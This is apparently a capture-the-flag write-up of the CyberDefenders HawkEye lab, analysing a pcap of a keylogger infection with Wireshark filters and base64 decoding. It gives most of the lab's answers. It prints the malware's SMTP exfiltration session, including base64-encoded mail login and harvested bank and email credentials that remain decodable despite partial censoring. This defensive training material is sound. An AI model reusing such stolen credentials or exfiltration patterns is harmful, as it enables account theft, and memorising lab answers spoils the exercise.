Reconstruct a HawkEye Keylogger data exfiltration incident by analyzing network traffic with Wireshark and CyberChef, identifying IoCs and stolen credentials.

Introduction

Today I’ll be going through the HawkEye lab on CyberDefenders. This is tagged as being a Medium difficulty challenge, so I’m excited to get into this!

Going off of the tags for the room it looks like we’ll be needing to use Wireshark, and possibly do some threat intel with VirusTotal.

Before we get started we’ll need to download the lab files. Unzip this and open up stealer.pcap with Wireshark.

An accountant at your organization received an email regarding an invoice with a download link. Suspicious network traffic was observed shortly after opening the email. As a SOC analyst, investigate the network trace and analyze exfiltration attempts.

The scenario introduction for this lab gives us a bit of context for the .pcap that we’ll be looking into. I’ve looked into phishing-focused tasks in the past, but only through the context of checking .eml headers, never through the network view with Wireshark.

Question one

How many packets does the capture have?

This should be fairly easy to answer. Just opening the .pcap in Wireshark gives you the number of packets. No need to write any filters or do anything fancy for this question.

Question two

At what time was the first packet captured (UTC)?

This is another question that we can answer as soon as we open the .pcap! If you’ve configured your Wireshark setup to display the time correctly (In an actual readable format with UTC, as god intended) then you’ll be able to spot this as soon as you see the packets.

To enable this, go to **View > Time Display Format > UTC Year, Day of Year, and Time of Day like so: A Wireshark screenshot showing the above View > Time Display Format > UTC Year, Day of Year, and Time of Day options

This will give you the UTC time of all packets. UTC is the standard time format that people will use when reporting on incidents, many SIEM tools also show times in UTC, so it’s best to start using it now!

Question three

What is the duration of the capture?

Another easy one. When I first looked at this lab I was worried by how many questions there were (24 of them!). Now that we’re getting into the swing of things it’s becoming aparent that these questions are fairly easy to answer. At least at the start here.

We can find this answer by viewing the Capture File Properties under the Statistics tab. In fact we can get the answer for question two from this screen as well.

The Capture File Properties screen is good to check when you’re first given a .pcap to get a quick overview of the capture file. In fact - We can retrieve the answer for question one here as well!

The answer is easy to grab here. Hopefully the questions stay being this easy and we’ll be done in no time!

Question four

What is the most active computer at the link level?

This is another answer we can get from the Statistics tab. Under Statistics > Conversations we can sort by how many packets were sent to and from which MAC addresses. Thankfully all we need is the Address A MAC address for this answer. This is another quick and easy answer to get.

Make sure that you haven’t enabled ‘Name Resolution’ in the left hand side, or the MAC address will be translated to the physical name of the NIC. This isn’t bad to note down, but for this answer we need to use the MAC address.

Question five

Manufacturer of the NIC of the most active system at the link level?

I alluded to this in the last question, but we can now enable the ‘Name Resolution’ option on the left hand side of the Conversations panel. This will show you the Manufacturer name of the NIC. Keep in mind that the information shown will not be the full name, you will need to infer this. The answer is one of the most popular hardware manufacturers out there, so you should be able to get this straight away. If you need a hand then search up the start of the resolved name.

Question six

Where is the headquarter of the company that manufactured the NIC of the most active computer at the link level?

We don’t need to use Wireshark for this. Simply search the name of the company and you should quickly see where the manufacturer’s headquarters are located.

The answer is where quite a few big tech companies are based, just in case you needed a hint.

Question seven

The organization works with private addressing and netmask /24. How many computers in the organization are involved in the capture?

Back to Wireshark again! With the Statistics > Conversations page still open (Or just open it again) we can go to the IPv4 tab. For question five we needed to check the Ethernet tab for the MAC Address, to check the subnet we can go to the IPv4 section instead.

Sort the ‘Address B’ column to sort these in order and just count all the private IP addresses in the /24 subnet. Should be pretty easy to do!

Question eight

What is the name of the most active computer at the network level?

The Conversations pane clearly shows that the device with the IP 10.4.10.132 is the most active on the netork, but we need the NetBIOS name for this answer.

We can finally write a Wireshark filter now! Only took us eight questions.

There are a few ways that we can find the hostname that belongs to the IP address. What seems to be the intended method (based on the hints) is using dhcp related filters. Here’s the filter I found that gave me exactly one packet in return: dhcp && ip.src == 10.4.10.132

If you check this packet you’ll see the hostname of the endpoint under the Option: (12) Host Name field.

There are most likely some better ways we can find the hostnames of endpoints but I’m satisfied with this. It gives us the answer and that’s all that really matters.

Question nine

What is the IP of the organization’s DNS server?

I got this answer with a very basic dns filter. It’s not elegant and I wasn’t too happy with applying and guessing so let’s see how we can improve it.

dns.flags.response is a field in DNS packets that indicate whether a DNS is a query or a response. From the scenario text we know that the infected IP is a users endpoint and not a server. We can craft a filter where the Source is our infected IP (10.4.10.132), sending dns packets that are queries. dns.flags.response == 0 is for queries. Putting that all together we get this filter:

ip.src == 10.4.10.132 && dns && dns.flags.response == 0

This gives us 39 packets with the destination IP being our answer. For me this was already resolved to a hostname/FQDN but by inspecting the packet closer you can quickly find the IP address that the question is asking for.

Question ten

What domain is the victim asking about in packet 204?

A quick Ctrl + G for packet 204 will take you directly to that ticket. Using the above filter we can already see this packet just in case you want to do it the manual way (Which you shouldn’t).

Analyze the packet and check the DNS parameters for the domain they are querying. Pretty simple and easy one.

Question eleven

What is the IP of the domain in the previous question?

There’s a few different methods of finding this answer. The easiest is to just right click on packet 204 and follow the UDP packet. This will show us ticket 206 with the DNS response from the server that shows the IP address for the domain. Another very simple one.

Question twelve

Indicate the country to which the IP in the previous section belongs.

I like to use ipinfo.io to get geolocation information on IP addresses. They have an API with a generous amount of daily requests on the free plan that gives you a lot of useful information. Other APIs/TI tools out there will give you the same information, but once you have the correct IP Address you’ll be able to get this question pretty quickly.

Question thirteen

What operating system does the victim’s computer run?

We can analyze the User-Agent sent by the victim (10.4.10.132) to find information like the Operating System. I wrote this filter that returned one packet that contained User-Agent information: ip.src == 10.4.10.132 && http.request.method == GET.

This uses the victim IP as a source and specifies GET requests, which usually include User-Agent information. You’ll find this User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

If you know how to read this, good job, you have the answer. If you don’t, then you can use something like a User-Agent parser. In the linked website you’ll need to use the Operating System Version (full) value instead of the Operating System Version value. These are slightly different but only one will give you the answer.

Question fourteen

What is the name of the malicious file downloaded by the accountant?

The very same packet that we used to answer question thirteen can be used for this answer too!

The GET request that contains the User-Agent also has a request URI value that reveals the actual resource the GET request was for. The filename alone already seems suspicious. It’s pretty easy to spot, so just look closer at the packet information using the same Wireshark filter that I wrote for the above question.

Question fifteen

What is the md5 hash of the downloaded file?

We can get this suspicious file by exporting it through File > Export Objects > HTTP, then select the filename identified in question fourteen.

Once this malicious file is exported you can use something like md5sum to grab the answer - md5sum ./tkraw_Protected99.exe

Question sixteen

What software runs the webserver that hosts the malware?

The IP address of the server that hosted the malware is 217.182.138.150. We can write a filter to find any packets that contain an HTTP reply from this server, which will likely have some information like the software running on it. Here’s the one I wrote: http && ip.src == 217.182.138.150.

This filter will only show one packet. Analyzing this packet will show you the webserver software running under the ‘Server’ parameter.

Question seventeen

What is the public IP of the victim’s computer?

This took me a while to find. I ended up backtracking to one of the previous filters - ip.src == 10.4.10.132 && http.request.method == GET. When we were trying to find the User-Agent in question thirteen I noticed a few requests going to bot.whatismyipaddress.com. If we follow the HTTP Stream you can see the reply from this webpage, which contains nothing but the public IP address of the victim.

Question eighteen

In which country is the email server to which the stolen information is sent?

This question threw me off a little as I’ve never actually investigated emails from the network point of view. I quickly found how easy it was!

Email traffic obviously uses SMTP, and we know that the victim computer (and IP) will be the one that will be having data exfiltrated. With these two requirements we can write this filter: ip.src == 10.4.10.132 && smtp. It’s super simple and might not work in a real environment where emails are sent throughout the day (Or even throughout the course of the packet capture).

The results from this filter show only one destination IP address - 23.229.162.69.

Using ipinfo or any other Threat Intelligence site will get you the answer for this question once we found that IP.

Question nineteen

Analyzing the first extraction of information. What software runs the email server to which the stolen data is sent?

The first part of this question made me wonder if I had missed a section. I’m not sure why it’s worded this way, but the answer isn’t too hard once you wrap your head around what it is that the question is asking.

We don’t actually need to write a new filter for this either. Using the same filter (ip.src == 10.4.10.132 && smtp) as in question eighteen we can simply follow the TCP stream of any of the packets and get the following:

220-p3plcpnl0413.prod.phx3.secureserver.net ESMTP #### #### #1 Wed, 10 Apr 2019 13:38:15 -0700 
220-We do not authorize the use of this system to transport unsolicited, 
220 and/or bulk e-mail.

EHLO Beijing-5cd1-PC

250-p3plcpnl0413.prod.phx3.secureserver.net Hello Beijing-5cd1-PC [173.66.146.112]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-CHUNKING
250-STARTTLS
250-SMTPUTF8
250 HELP

AUTH login c2FsZXMuZGVsQG1hY3dpbmxvZ2lzdGljcy5pbg==

334 UGFzc3dvcmQ6

U2FsZXNAMjM=

235 Authentication succeeded

MAIL FROM:<sales.del@macwinlogistics.in>

250 OK

RCPT TO:<sales.del@macwinlogistics.in>

250 Accepted

DATA

354 Enter message, ending with "." on a line by itself

MIME-Version: 1.0
From: sales.del@macwinlogistics.in
To: sales.del@macwinlogistics.in
Date: 10 Apr 2019 20:38:08 +0000
Subject: =?utf-8?B?SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkgLSBQYXNzd29yZHMgTG9ncyAtIHJvbWFuLm1jZ3VpcmUgXCBCRUlKSU5HLTVDRDEtUEMgLSAxNzMuNjYuMTQ2LjExMg==?=
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64

SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkNClBhc3N3b3JkcyBMb2dzDQpyb21hbi5t
Y2d1aXJlIFwgQkVJSklORy01Q0QxLVBDDQoNCj09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09DQpVUkwgICAgICAgICAgICAgICA6IGh0dHBzOi8v
bG9naW4uYW9sLmNvbS9hY2NvdW50L2NoYWxsZW5nZS9wYXNzd29yZA0KV2ViIEJyb3dzZXIg
ICAgICAgOiBJbnRlcm5ldCBFeHBsb3JlciA3LjAgLSA5LjANClVzZXIgTmFtZSAgICAgICAg
IDogcm9tYW4ubWNndWlyZTkxNEBhb2wuY29tDQpQYXNzd29yZCAgICAgICAgICA6IFBAc3N3
MHJkJA0KUGFzc3dvcmQgU3RyZW5ndGggOiBWZXJ5IFN0cm9uZw0KVXNlciBOYW1lIEZpZWxk
ICAgOiANClBhc3N3b3JkIEZpZWxkICAgIDogDQpDcmVhdGVkIFRpbWUgICAgICA6IA0KTW9k
aWZpZWQgVGltZSAgICAgOiANCkZpbGVuYW1lICAgICAgICAgIDogDQo9PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQo9PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KVVJMICAgICAgICAgICAg
ICAgOiBodHRwczovL3d3dy5iYW5rb2ZhbWVyaWNhLmNvbS8NCldlYiBCcm93c2VyICAgICAg
IDogQ2hyb21lDQpVc2VyIE5hbWUgICAgICAgICA6IHJvbWFuLm1jZ3VpcmUNClBhc3N3b3Jk
ICAgICAgICAgIDogUEBzc3cwcmQkDQpQYXNzd29yZCBTdHJlbmd0aCA6IFZlcnkgU3Ryb25n
DQpVc2VyIE5hbWUgRmllbGQgICA6IG9ubGluZUlkMQ0KUGFzc3dvcmQgRmllbGQgICAgOiBw
YXNzY29kZTENCkNyZWF0ZWQgVGltZSAgICAgIDogNC8xMC8yMDE5IDI6MzU6MTcgQU0NCk1v
ZGlmaWVkIFRpbWUgICAgIDogDQpGaWxlbmFtZSAgICAgICAgICA6IEM6XFVzZXJzXHJvbWFu
Lm1jZ3VpcmVcQXBwRGF0YVxMb2NhbFxHb29nbGVcQ2hyb21lXFVzZXIgRGF0YVxEZWZhdWx0
XExvZ2luIERhdGENCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09DQoNCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09DQpOYW1lICAgICAgICAgICAgICA6IFJvbWFuIE1jR3VpcmUNCkFwcGxpY2F0
aW9uICAgICAgIDogTVMgT3V0bG9vayAyMDAyLzIwMDMvMjAwNy8yMDEwDQpFbWFpbCAgICAg
ICAgICAgICA6IHJvbWFuLm1jZ3VpcmVAcGl6emFqdWtlYm94LmNvbQ0KU2VydmVyICAgICAg
ICAgICAgOiBwb3AucGl6emFqdWtlYm94LmNvbQ0KU2VydmVyIFBvcnQgICAgICAgOiA5OTUN
ClNlY3VyZWQgICAgICAgICAgIDogTm8NClR5cGUgICAgICAgICAgICAgIDogUE9QMw0KVXNl
ciAgICAgICAgICAgICAgOiByb21hbi5tY2d1aXJlDQpQYXNzd29yZCAgICAgICAgICA6IFBA
c3N3MHJkJA0KUHJvZmlsZSAgICAgICAgICAgOiBPdXRsb29rDQpQYXNzd29yZCBTdHJlbmd0
aCA6IFZlcnkgU3Ryb25nDQpTTVRQIFNlcnZlciAgICAgICA6IHNtdHAucGl6emFqdWtlYm94
LmNvbQ0KU01UUCBTZXJ2ZXIgUG9ydCAgOiA1ODcNCj09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoNCg==

.

250 OK id=1hEJz6-00G6e9-Af
421 p3plcpnl0413.prod.phx3.secureserver.net lost input connection

This conversation has a whole trove of information that we will use to answer future questions, but for now we can focus on the very beginning of the conversation. I’ve censored the name and version out, but this is the software running the email server on the IP address we have identified earlier (23.229.162.69).

Question twenty

To which email account is the stolen information sent?

Quick one to answer. We can use the full dump of the conversation from question nineteen to answer this. Check the RCPT TO value.

Question twenty-one

What is the password used by the malware to send the email?

This answer is also visible in the conversation I dumped back in question nineteen, though not in plaintext.

AUTH login c2FsZXMuZGVsQG1hY3dpbmxvZ2lzdGljcy5pbg==

334 UGFzc3dvcmQ6

U2FsZXNAMjM=

235 Authentication succeeded

This section shows a successful auth attempt. Both credentials given here are encoded in Base64. This is a fairly common encoding scheme that you’ll see show up all over the place. The second parameter (U2FsZXNAMjM=) is the passord.

You can use any sort of tool, like base64 -d from the CLI, or CyberChef to decode this Base64 string and get the answer.

Question twenty-two

Which malware variant exfiltrated the data?

This is yet another answer that we can find in the Base64 encoded text found in question nineteen. We can pipe the entire string into base64 -d and get the below plaintext:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


HawkEye Keylogger - #########
Passwords Logs
roman.mcguire \ BEIJING-5CD1-PC

==================================================
URL               : https://login.aol.com/account/challenge/password
Web Browser       : Internet Explorer 7.0 - 9.0
User Name         : roman.mcguire914@aol.com
Password          : #########
Password Strength : Very Strong
User Name Field   : 
Password Field    : 
Created Time      : 
Modified Time     : 
Filename          : 
==================================================

==================================================
URL               : https://www.bankofamerica.com/
Web Browser       : Chrome
User Name         : #########
Password          : #########
Password Strength : Very Strong
User Name Field   : onlineId1
Password Field    : passcode1
Created Time      : 4/10/2019 2:35:17 AM
Modified Time     : 
Filename          : C:\Users\roman.mcguire\AppData\Local\Google\Chrome\User Data\Default\Login Data
==================================================

==================================================
Name              : Roman McGuire
Application       : MS Outlook 2002/2003/2007/2010
Email             : roman.mcguire@pizzajukebox.com
Server            : pop.pizzajukebox.com
Server Port       : 995
Secured           : No
Type              : POP3
User              : #########
Password          : #########
Profile           : Outlook
Password Strength : Very Strong
SMTP Server       : smtp.pizzajukebox.com
SMTP Server Port  : 587
==================================================

At the very top we can see the variant and version number for this malware. I’ve censored it out, but if you follow along and extract this plaintext you should find it pretty quickly!

Question twenty-three

What are the bankofamerica access credentials? (username:password)

We can answer this with the plaintext from question twenty-two. Just find the credentials (also censored above) under the https://www.bankofamerica.com/ URL.

Question twenty-four

Every how many minutes does the collected data get exfiltrated?

Reusing the filter from before - ip.src == 10.4.10.132 && smtp gets this answer. Just check on the timestamp and calculate the interval. It’s pretty easy to see!

Conclusion

I was daunted by the number of questions at first, but these were all fun to put together and find the answer. It’s only been a week or so of me grinding out Wireshark specific labs, but I already feel much more comfortable writing filters and following along with questions. There will be plenty more coming soon!

Introduction#

Question one#

Question two#

Question three#

Question four#

Question five#

Question six#

Question seven#

Question eight#

Question nine#

Question ten#

Question eleven#

Question twelve#

Question thirteen#

Question fourteen#

Question fifteen#

Question sixteen#

Question seventeen#

Question eighteen#

Question nineteen#

Question twenty#

Question twenty-one#

Question twenty-two#

Question twenty-three#

Question twenty-four#

Conclusion#